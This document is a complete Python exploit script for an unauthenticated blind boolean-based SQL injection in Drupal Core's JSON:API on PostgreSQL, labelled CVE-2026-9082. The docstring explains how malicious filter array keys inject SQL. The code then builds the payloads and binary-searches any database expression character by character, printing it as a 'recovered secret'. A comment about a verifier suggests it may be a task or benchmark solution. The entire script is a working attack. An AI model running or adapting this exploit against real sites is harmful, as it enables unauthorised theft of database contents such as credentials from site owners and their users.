#!/usr/bin/env python3
"""
CVE-2026-9082 blind boolean-based SQL injection extractor (Drupal Core / PostgreSQL).

The PostgreSQL EntityQuery Condition::translateCondition() builds PDO named
placeholders from attacker-controlled array keys in
    filter[t][condition][value][<KEY>]
A key beginning with ')' truncates the placeholder name at that character; the
remainder of the key becomes literal SQL injected into the entity query. We use a
key of the form

    1))/**/AND/**/(<PRED>)/**/AND/**/((1=1

which, given values [0]=<seed title>, [1]=x and this malicious key, yields a
syntactically balanced WHERE:

    ((LOWER(title) IN (LOWER(:t0),LOWER(:t1),LOWER(:t1)) AND (<PRED>) AND ((1=1))))

The base IN is TRUE (value[0] matches the seed article), so the article is
returned IFF <PRED> is TRUE. That gives a boolean oracle (1 data item = TRUE,
0 items = FALSE) which we use to binary-search each character of an arbitrary
scalar SQL expression. Unauthenticated; only the public JSON:API HTTP surface is
touched.
"""
import sys, json, urllib.request, urllib.error

BASE_URL = sys.argv[1].rstrip("/")
BASE_TITLE = sys.argv[2]
SQL = sys.argv[3]

ENDPOINT = BASE_URL + "/jsonapi/node/article"


def pct(s: str) -> str:
    """Percent-encode every non-unreserved byte (keeps our SQL intact through PHP)."""
    out = []
    for b in s.encode():
        c = chr(b)
        out.append(c if (c.isalnum() or c in "-_.~") else "%%%02X" % b)
    return "".join(out)


def is_true(pred: str) -> bool:
    inj = "1))/**/AND/**/(" + pred + ")/**/AND/**/((1=1"
    params = [
        ("filter[t][condition][path]", "title"),
        ("filter[t][condition][operator]", "IN"),
        ("filter[t][condition][value][0]", BASE_TITLE),
        ("filter[t][condition][value][1]", "x"),
        ("filter[t][condition][value][" + pct(inj) + "]", "zzz"),
    ]
    qs = "&".join(n + "=" + pct(v) for n, v in params)
    url = ENDPOINT + "?" + qs
    try:
        with urllib.request.urlopen(url, timeout=60) as r:
            d = json.loads(r.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        body = e.read().decode("utf-8", "replace")
        # A 500 here means our predicate broke SQL syntax — surface it loudly.
        raise SystemExit("ERROR: HTTP %d from oracle (predicate=%r): %s"
                         % (e.code, pred, body[:300]))
    return len(d.get("data", [])) > 0


def find_length(expr: str, cap: int = 4096) -> int:
    # Confirm reachability + non-null, then binary-search the length.
    if not is_true("(SELECT length((%s)))>0" % expr):
        raise SystemExit("ERROR: expression yields NULL/empty or oracle not firing: %s" % expr)
    lo, hi = 1, cap
    while lo < hi:
        mid = (lo + hi) // 2
        if is_true("(SELECT length((%s)))>%d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_char(expr: str, pos: int) -> str:
    # ASCII binary search over printable range.
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if is_true("(SELECT ascii(substring((%s) FROM %d FOR 1)))>%d" % (expr, pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def main():
    sys.stderr.write("[*] Target: %s\n" % ENDPOINT)
    sys.stderr.write("[*] Extracting via boolean-blind SQLi: %s\n" % SQL)
    n = find_length(SQL)
    sys.stderr.write("[*] Recovered length: %d\n" % n)
    chars = []
    for pos in range(1, n + 1):
        ch = extract_char(SQL, pos)
        chars.append(ch)
        sys.stderr.write("\r[*] %d/%d: %s" % (pos, n, "".join(chars)))
        sys.stderr.flush()
    sys.stderr.write("\n")
    value = "".join(chars)
    # Clearly labeled stdout line for the verifier to capture.
    print("RECOVERED_SECRET=" + value)


if __name__ == "__main__":
    main()
